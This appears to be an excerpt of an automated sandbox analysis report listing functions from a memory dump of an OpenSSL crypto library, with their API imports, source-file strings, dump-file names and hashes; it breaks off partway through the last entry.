Uniqueness Score: -1.00%

Function 00007FFD3FBE2E46 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FCEDA72

Strings

~, xrefs: 00007FFD3FCEDB24
~, xrefs: 00007FFD3FCEDAA7
~, xrefs: 00007FFD3FCEDA8C
~, xrefs: 00007FFD3FCEDB3C
OPENSSL_ia32cap, xrefs: 00007FFD3FCEDA48

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: EnvironmentVariable
String ID: OPENSSL_ia32cap$~$~$~$~
API String ID: 1431749950-1981414212
Opcode ID: f486ce1cfee4a3b5e685cf6b8b62f55f730816d45d2e4adaded798ca22c85bd0
Instruction ID: d250676547e09d333397d366cd6176188c979d81e7239da7b25d1eebc57244c5
Opcode Fuzzy Hash: f486ce1cfee4a3b5e685cf6b8b62f55f730816d45d2e4adaded798ca22c85bd0
Instruction Fuzzy Hash: 3B418924F0965B8AE7189B01B4B15B833A0EF14782F485235EF6E476E4EF3CE489E740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE39B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_stat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFD3FDAE1F9
_chmod.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFD3FDAE2BD
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FDAE2D6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FDAE2E2

Strings

..\s\crypto\rand\randfile.c, xrefs: 00007FFD3FDAE21C, 00007FFD3FDAE280
Filename=, xrefs: 00007FFD3FDAE232, 00007FFD3FDAE2A1

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: _chmod_stat64i32fclosefwrite
String ID: ..\s\crypto\rand\randfile.c$Filename=
API String ID: 4260490851-2201148535
Opcode ID: 630aeb2054095e1f1a8cda667d2b95e01c7df40872773866026865af2fe33a64
Instruction ID: bad2f19442430b6bf56311d35555275bafbcb7e7bcb36935e5a985c4cccea4de
Opcode Fuzzy Hash: 630aeb2054095e1f1a8cda667d2b95e01c7df40872773866026865af2fe33a64
Instruction Fuzzy Hash: 703101B2F0868A92EA28DB12E4243B97351FF94784F440135EB1D07795DF3CE208E705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE648D Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE13848
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE138B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE138E1

Strings

critical,, xrefs: 00007FFD3FE13841
DER:, xrefs: 00007FFD3FE138A9
ASN1:, xrefs: 00007FFD3FE138D4

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: ASN1:$DER:$critical,
API String ID: 1114863663-369496153
Opcode ID: de443b3aff505946f38698003a95b9c058f7ee2abbcd9526c5eef4571ad96e1e
Instruction ID: 863d01595f98ef8723a2fa342285a3b5da35c23a4da6390f5470beafedf11fc5
Opcode Fuzzy Hash: de443b3aff505946f38698003a95b9c058f7ee2abbcd9526c5eef4571ad96e1e
Instruction Fuzzy Hash: 88411262B0868A05FB185B27E82033A6785AF95BD4F085030DE6D23BD9EE3EE405E700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4DF4 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 108stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE13367

Strings

critical,, xrefs: 00007FFD3FE13360
DER:, xrefs: 00007FFD3FE133C9
ASN1:, xrefs: 00007FFD3FE133F4

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: ASN1:$DER:$critical,
API String ID: 1114863663-369496153
Opcode ID: 8af6359aad0b0d2726aee0f9c81e1e06185f90608676e801a22fc0c277deab40
Instruction ID: 9465e223dcdb871b30160dcfcb941b8e14b98028b9932f3018647fff25b1d628
Opcode Fuzzy Hash: 8af6359aad0b0d2726aee0f9c81e1e06185f90608676e801a22fc0c277deab40
Instruction Fuzzy Hash: 90412462B08A8A46FB189F26E8207797B90BF95BD4F485130DF6E63B89DE3DD405D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FCA7070 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129networkCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FFD3FCA6823), ref: 00007FFD3FCA70BD
getnameinfo.WS2_32 ref: 00007FFD3FCA710B
htons.WS2_32 ref: 00007FFD3FCA717B

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFD3FCA7124, 00007FFD3FCA71A6, 00007FFD3FCA71C5, 00007FFD3FCA71F5, 00007FFD3FCA7212, 00007FFD3FCA7234
, xrefs: 00007FFD3FCA70F1

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: getnameinfohtonsmemset
String ID: $..\s\crypto\bio\b_addr.c
API String ID: 165288700-1606403076
Opcode ID: 9ecc4f5e3f3591162f962708eab71256c5c0d696df9f1a81568cd084f2486a28
Instruction ID: 3c3e00c672d111f488d5ce50a438aa6a8bbc4357150ece7311339d1e11d4d1a2
Opcode Fuzzy Hash: 9ecc4f5e3f3591162f962708eab71256c5c0d696df9f1a81568cd084f2486a28
Instruction Fuzzy Hash: 4D51D162B0868A85FB699B11F4A02BD73A1FF90744F444132EB8D07A95EF3DF945A701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1762 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 203COMMON

Download Yara Rule

Strings

..\s\crypto\rsa\rsa_sign.c, xrefs: 00007FFD3FDBF87D, 00007FFD3FDBF8B0, 00007FFD3FDBF8C7, 00007FFD3FDBF93B, 00007FFD3FDBF995, 00007FFD3FDBFB1A, 00007FFD3FDBFB37
$, xrefs: 00007FFD3FDBF983

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: $$..\s\crypto\rsa\rsa_sign.c
API String ID: 0-1864662394
Opcode ID: c783944150a0a188bece652a86d384bdb4a4edc247bb5b64769aec5a5d5f2025
Instruction ID: 6c773d9e3793a8d2b4075efc26792d69856223155a735af18433040a4bad59f6
Opcode Fuzzy Hash: c783944150a0a188bece652a86d384bdb4a4edc247bb5b64769aec5a5d5f2025
Instruction Fuzzy Hash: 7091D262B0C68A86F6389F91F0647BEA390FB44794F444035DB8D0BB85DFBCE941A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1ED3 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FD92E21

Strings

..\s\crypto\pem\pem_lib.c, xrefs: 00007FFD3FD92E6A, 00007FFD3FD92ED3, 00007FFD3FD92FBC
Enter PEM pass phrase:, xrefs: 00007FFD3FD92E37
;, xrefs: 00007FFD3FD92E62

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\pem\pem_lib.c$;$Enter PEM pass phrase:
API String ID: 2162964266-3733131234
Opcode ID: fc8628654de8ee2cf8fa8bc414cd2e8884ec7c11840ae54fee073c47672b8059
Instruction ID: 13bfe705a3a30a696d8b98c2153dbaa4ccd9621e95b5f3f6edaa0b3b22930455
Opcode Fuzzy Hash: fc8628654de8ee2cf8fa8bc414cd2e8884ec7c11840ae54fee073c47672b8059
Instruction Fuzzy Hash: AD71F3A2B0868A86E764DF61F4647AB73A0FB94794F440235EB8D47AC6DF3DD400EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2833 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

T, xrefs: 00007FFD3FCA3553
..\s\crypto\async\async.c, xrefs: 00007FFD3FCA33DF, 00007FFD3FCA342D, 00007FFD3FCA3446, 00007FFD3FCA347C, 00007FFD3FCA34C6, 00007FFD3FCA351C, 00007FFD3FCA353D, 00007FFD3FCA355B, 00007FFD3FCA3595, 00007FFD3FCA35BA

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\async\async.c$T
API String ID: 0-2182492907
Opcode ID: 74d88a44f49399f4e7992461156d0742c8f6df974512f5157967cd8219e86c44
Instruction ID: e20b898bf9aa5b9658f72b3844bf9ef80344a618f3f4836cf10ec02ebd159184
Opcode Fuzzy Hash: 74d88a44f49399f4e7992461156d0742c8f6df974512f5157967cd8219e86c44
Instruction Fuzzy Hash: 5651AB32B0964A82EB68DB11E4705AD6761EF84B84F440036DB4D07B96DF3EE609E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3841 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

J, xrefs: 00007FFD3FCA9FB5
host=, xrefs: 00007FFD3FCAA02E
..\s\crypto\bio\b_sock.c, xrefs: 00007FFD3FCA9F3A, 00007FFD3FCA9FBD

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\bio\b_sock.c$J$host=
API String ID: 0-1729655730
Opcode ID: fcecefbd6b3c22bac14a61ff0c3e70274d72c8b7029490169355bb568be67c9a
Instruction ID: 56a733542ef2887a10ab8b12ef3d92f217fd40fbcaca425f847d6eb0d87a479e
Opcode Fuzzy Hash: fcecefbd6b3c22bac14a61ff0c3e70274d72c8b7029490169355bb568be67c9a
Instruction Fuzzy Hash: 5331DE76B0868682EB18DB55F4A11AEA360FBC4784F480036EF8C43B9ADF3DE540DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFD3FCAAD70
WSAGetLastError.WS2_32 ref: 00007FFD3FCAAD7B

Strings

